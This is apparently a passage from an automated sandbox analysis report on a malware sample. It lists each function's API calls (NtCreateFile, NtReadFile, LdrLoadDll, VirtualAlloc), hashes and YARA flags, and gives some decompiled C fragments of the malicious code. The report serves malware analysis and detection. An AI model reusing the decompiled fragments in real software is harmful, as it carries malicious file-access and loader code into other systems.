                                                                                                                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                        • Instruction Fuzzy Hash: 4C511B70D08388EAEB11CBD8D849BDDBFB26F11708F144058E5447F286C7BA5568CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 002205B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 002205EC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                        • Instruction ID: cb952e8269240011596fa5b92d81d9eb0bdb741b22ecd29bbc71170d01f5757e
                                                                                                                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                        • Instruction Fuzzy Hash: 8B010C70C0425DEADF10DFD8D5583AEBFB5AB41308F148099D4092B252D7B69B68CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 03EC954E, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 03EC9596
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2086232665.0000000003EC8000.00000040.00000001.sdmp, Offset: 03EC8000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FirstModule32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3757679902-0
                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                        • Instruction ID: fe6972f1f039587da8403390a1a7a513df024bdaee5885ae9d34d9b9a172ddc1
                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                        • Instruction Fuzzy Hash: 98F0C2316103506BDB207BF8A98CA6EB6FCAF48328F14122CF652950C2CB70E8064A60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 03EC920D, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 03EC925E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2086232665.0000000003EC8000.00000040.00000001.sdmp, Offset: 03EC8000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                        • Instruction ID: abe354f9ae8191849bda52e04dc89df0158e1ae6ec2218f9253d5cbff1bd4c69
                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                        • Instruction Fuzzy Hash: 3B112B79A00208EFDB01DF98CA85E98BBF5AF08350F098094F9489B362D371EA50DB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 0022A1FB, Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                        • Opcode ID: 52a3563e9b82b145eb9740cff71069a9f321bfcff10e8ccd27d3ee347d847adc
                                                                                                                                                        • Instruction ID: e44b748ffe235ed6969018f93c81f81160ff6bb9cc7d4df207797288c0787d1f
                                                                                                                                                        • Opcode Fuzzy Hash: 52a3563e9b82b145eb9740cff71069a9f321bfcff10e8ccd27d3ee347d847adc
                                                                                                                                                        • Instruction Fuzzy Hash: 66021CB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0022A200, Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                        • Instruction ID: f07216134815f09ec55e8dc7f57dd9d92f214ce6032a6915bea540d49c841b13
                                                                                                                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                        • Instruction Fuzzy Hash: A7021EB6E006189FDB14CF99D8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0023CAA2, Relevance: 1.6, Strings: 1, Instructions: 373COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: {2K
                                                                                                                                                        • API String ID: 0-870351520
                                                                                                                                                        • Opcode ID: 536a93b5fe36b187dd2ce96dc80d1ec816f8eacc7ecfad78b0448455308f5814
                                                                                                                                                        • Instruction ID: e82e05e666db135b720a60f5b4b59c18d53f2cccf37baf0f079bb58aed3119bd
                                                                                                                                                        • Opcode Fuzzy Hash: 536a93b5fe36b187dd2ce96dc80d1ec816f8eacc7ecfad78b0448455308f5814
                                                                                                                                                        • Instruction Fuzzy Hash: 30027772A28795CFD716CF38D99AB113FB5F746310B18424EC8A2A35D2D774212ACF89
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0023E05A, Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ?G)b
                                                                                                                                                        • API String ID: 0-455291697
                                                                                                                                                        • Opcode ID: 117ca8e805a5da32afa949792610fed5621ccc83cb0d7df2917f9c5970590ecb
                                                                                                                                                        • Instruction ID: acfa46aff37721378143451385b05d18592197da72a045514a8f9ea97dab823d
                                                                                                                                                        • Opcode Fuzzy Hash: 117ca8e805a5da32afa949792610fed5621ccc83cb0d7df2917f9c5970590ecb
                                                                                                                                                        • Instruction Fuzzy Hash: A5516672828B56CFDB19CF34DC867513BB0F752720B18439EC862A71E1D7791269CB85
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00224550, Relevance: .4, Instructions: 435COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                        • Instruction ID: 14b69c3b18e3e664f683e67f8520ad9910b2c1c56f21663063b7fa9b7a1689f9
                                                                                                                                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                        • Instruction Fuzzy Hash: 02026F73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00224327, Relevance: .2, Instructions: 165COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6d4ddc81a94f55db7597d1e5d6bbd77ad6b24f1b20dcf67b8cf65cd9cf014b49
                                                                                                                                                        • Instruction ID: 1ca6c9028d28c84820882fff032d6e6eae14b9fc35b17a9b29ad97266b036970
                                                                                                                                                        • Opcode Fuzzy Hash: 6d4ddc81a94f55db7597d1e5d6bbd77ad6b24f1b20dcf67b8cf65cd9cf014b49
                                                                                                                                                        • Instruction Fuzzy Hash: B85185B3E14A214BD318CF05CC40635B692EFD8312B5F81BEDD1A9B357CE74E9529A90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00224330, Relevance: .2, Instructions: 165COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                        • Instruction ID: 720f737326204917769bad0541075cbfd44445371e1622b67b6a49c4c3770f21
                                                                                                                                                        • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                        • Instruction Fuzzy Hash: D15170B3E14A214BD3188F09DC40631B792FFD8312B5F81BADD199B357CE74E9529A90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0023D2CF, Relevance: .2, Instructions: 163COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9e386fc24eff8e2f4351ccd72da9c12e8b1d196191a3e103c7260600953e6970
                                                                                                                                                        • Instruction ID: 6c4dfb54d2be31993259e2f1c480e445c7a0fe740773f395a6e5f88398727476
                                                                                                                                                        • Opcode Fuzzy Hash: 9e386fc24eff8e2f4351ccd72da9c12e8b1d196191a3e103c7260600953e6970
                                                                                                                                                        • Instruction Fuzzy Hash: E0717772A15355CFD712DF38DD863423BB0F722720F24424ED8A193692E7716126CF8A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0023DA6F, Relevance: .2, Instructions: 157COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3e915b007a7f8357d87286f1f53eaa88a8036a2b9d069f95b5d4477ef2bf1dc3
                                                                                                                                                        • Instruction ID: 3d99abed695b26f00f3ec84a44b412066986241d767a43e3dd5bea8fa972d29c
                                                                                                                                                        • Opcode Fuzzy Hash: 3e915b007a7f8357d87286f1f53eaa88a8036a2b9d069f95b5d4477ef2bf1dc3
                                                                                                                                                        • Instruction Fuzzy Hash: E1710D329493C1DFE715EF79E8AA7813F71F792320B48029DC9A15B1D2D3B4216ACB85
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 002225D0, Relevance: .1, Instructions: 108COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                        • Instruction ID: 332f51e855d62fbcc1f3865cae85a76812879b352f10a059fc7da19ff3592fa0
                                                                                                                                                        • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                        • Instruction Fuzzy Hash: 303182126586F14DD30E436D08BD675AEC18E5720174EC2FEDADA6F2F3C0888418D3A1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00222714, Relevance: .1, Instructions: 81COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2131e98c72c42a44a6543b0f590bacb678a8333d2806488852c554c4286459bf
                                                                                                                                                        • Instruction ID: 8e2a9752b04de727483892bcc7f62ddda10f892f133184a8f47e2a1320eac6b5
                                                                                                                                                        • Opcode Fuzzy Hash: 2131e98c72c42a44a6543b0f590bacb678a8333d2806488852c554c4286459bf
                                                                                                                                                        • Instruction Fuzzy Hash: CA212D35A08355AFC719CFBCC4815ADFFA1EF89310B68C29DC8995B393C2724816C750
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 03EC8E2B, Relevance: .1, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2086232665.0000000003EC8000.00000040.00000001.sdmp, Offset: 03EC8000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction ID: f99191a0ae6f9d523ae7d5c7e42f6b8602ca5103455683db4abd787446f0e406
                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction Fuzzy Hash: 9811A172350200AFD744DF55DEC0FEA73EAEB88620B198169ED08CF316E675E802C760
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00220042, Relevance: .1, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction ID: 36fb6f7d87f4710edc92918b0a4e3ee1a20c97347ccdcc309f284cc1cd3e3bb5
                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction Fuzzy Hash: D0117072350110AFE754DEA5ECD1FA673EAEB88320B298155E908CB312D675ED11C760
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00229B80, Relevance: .0, Instructions: 13COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
                                                                                                                                                        • Instruction ID: 74fc0706d39a7bc634382559c14bd00d220f343a0a708aa946c05706e07cdea6
                                                                                                                                                        • Opcode Fuzzy Hash: 6fdb5d962cb1f86e8147c9bd6198d47279a6e91c6587f141da967a87c653173b
                                                                                                                                                        • Instruction Fuzzy Hash: 45C04C70A451585BDB0889799E127EA76988305211F1402BD780FC2244E55E591055A6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: vbc.exe PID: 2564 Parent PID: 2616 vbc.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: R=A$R=A
                                                                                                                                                        • API String ID: 2738559852-3742021989
                                                                                                                                                        • Opcode ID: 909aa5a245d48812f77c58f933760682901bcd102153e38b1923f68efc9dfb02
                                                                                                                                                        • Instruction ID: 2ba84caaadc622240e861cb26b9ba5da1393a070836c945a2d03e797859a7331
                                                                                                                                                        • Opcode Fuzzy Hash: 909aa5a245d48812f77c58f933760682901bcd102153e38b1923f68efc9dfb02
                                                                                                                                                        • Instruction Fuzzy Hash: CB21B8B2200108AFDB14DF99DC81EEB77ADEF8C754F158649FA1DA7241CA34E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                        0x00418273
                                                                                                                                                        0x0041827f
                                                                                                                                                        0x00418287
                                                                                                                                                        0x00418292
                                                                                                                                                        0x004182ad
                                                                                                                                                        0x004182b5
                                                                                                                                                        0x004182b9

                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: R=A$R=A
                                                                                                                                                        • API String ID: 2738559852-3742021989
                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004181BA, Relevance: 1.6, APIs: 1, Instructions: 71filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                                        			E004181BA(void* __ebx, void* __edi, void* _a1, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _t28;
				long _t40;
				signed char _t42;
				void* _t62;
				intOrPtr* _t63;

				_t61 = __edi - 1;
				if(__edi - 1 > 0) {
					 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | _t42;
					_t63 = _t28 + 0xc44;
					E00418DC0(_t61, _t28, _t63,  *((intOrPtr*)(_t28 + 0x10)), 0, 0x29);
					return  *((intOrPtr*)( *_t63))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t62);
				} else {
					asm("rcl byte [eax+eax*2-0x741374ab], 1");
					_t34 = _a4;
					_push(_t62);
					_t3 = _t34 + 0xc40; // 0xc40
					E00418DC0(_t61, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
					_t40 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					return _t40;
				}
			}








                                                                                                                                                        0x004181ba
                                                                                                                                                        0x004181bb
                                                                                                                                                        0x00418225
                                                                                                                                                        0x0041822f
                                                                                                                                                        0x00418237
                                                                                                                                                        0x00418269
                                                                                                                                                        0x004181bd
                                                                                                                                                        0x004181bd
                                                                                                                                                        0x004181c3
                                                                                                                                                        0x004181c9
                                                                                                                                                        0x004181cf
                                                                                                                                                        0x004181d7
                                                                                                                                                        0x0041820d
                                                                                                                                                        0x00418211
                                                                                                                                                        0x00418211

                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: d06c22877cccc1304cd0d5e8a167a1d7dd7636f2f2587f7672da8cbc3b7c47e6
                                                                                                                                                        • Instruction ID: 82f27e5dbeb61c95509b8350a27b22fb312ef2eed5b6af0adeeb7139150ea748
                                                                                                                                                        • Opcode Fuzzy Hash: d06c22877cccc1304cd0d5e8a167a1d7dd7636f2f2587f7672da8cbc3b7c47e6
                                                                                                                                                        • Instruction Fuzzy Hash: 5B2108B2210149AFCB08DF99D884CEB77A9FF8C354B15868DF91D97202C634E851CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                        0x00409b29
                                                                                                                                                        0x00409b3c
                                                                                                                                                        0x00409b3f
                                                                                                                                                        0x00409b44
                                                                                                                                                        0x00409b49
                                                                                                                                                        0x00409b53
                                                                                                                                                        0x00409b58
                                                                                                                                                        0x00409b5b
                                                                                                                                                        0x00409b5d
                                                                                                                                                        0x00409b65
                                                                                                                                                        0x00409b6a
                                                                                                                                                        0x00409b6a
                                                                                                                                                        0x00409b71
                                                                                                                                                        0x00409b79
                                                                                                                                                        0x00409b7c
                                                                                                                                                        0x00409b7e
                                                                                                                                                        0x00409b92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409b94
                                                                                                                                                        0x00409b9a
                                                                                                                                                        0x00409b4e
                                                                                                                                                        0x00409b4e
                                                                                                                                                        0x00409b4e

                                                                                                                                                        APIs
                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                        0x004181cf
                                                                                                                                                        0x004181d7
                                                                                                                                                        0x0041820d
                                                                                                                                                        0x00418211

